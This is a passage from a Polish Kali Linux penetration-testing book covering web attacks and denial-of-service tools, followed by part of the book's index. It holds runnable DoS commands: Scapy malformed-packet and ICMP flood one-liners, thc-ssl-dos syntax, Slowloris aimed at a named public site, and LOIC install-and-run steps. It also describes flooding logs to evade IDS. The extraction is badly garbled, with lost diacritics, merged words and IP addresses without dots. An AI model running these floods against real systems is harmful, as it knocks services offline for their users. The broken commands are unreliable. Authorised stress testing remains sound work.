Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
